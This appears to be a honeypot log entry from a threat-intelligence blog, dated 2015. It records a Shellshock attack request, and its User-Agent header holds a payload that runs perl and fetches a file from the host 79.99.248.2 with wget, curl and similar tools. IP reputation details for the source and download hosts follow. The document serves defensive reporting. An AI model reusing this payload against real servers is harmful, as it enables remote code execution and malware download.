Sonntag, 4. Oktober 2015

187.210.107.242 - wget from 79.99.248.2

BEGIN OF HTTP DATA:
2015-10-04 16:57:03
Source IP: 187.210.107.242
Country: MX RiskScore: 10 Malware:
GET /cgi-bin/php4 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget 79.99.248.2/TEST231;curl 79.99.248.2/TEST231;fetch 79.99.248.2/TEST231;lwp-download 79.99.248.2/TEST231;GET 79.99.248.2/TEST231");'
Host: 109.234.106.8
Connection: Close


79.99.248[.]2

    Static Source: GeoIP data
  • Country: Georgia
  • ASN: AS44877 Vtel-Georgia
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/79.99.248.2

187.210.107[.]242

    Static Source: GeoIP data
  • Country: Mexico
  • ASN: AS8151 Uninet S.A. de C.V.
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/187.210.107.242
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/187.210.107.242
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Dynamic Source: projecthoneypot.org
  • Last seen: 20 day(s) ago
  • Score: 25 (25 = 100 Spam per day, 75 = 1mio Spam per day)
  • Category: Suspicious (1)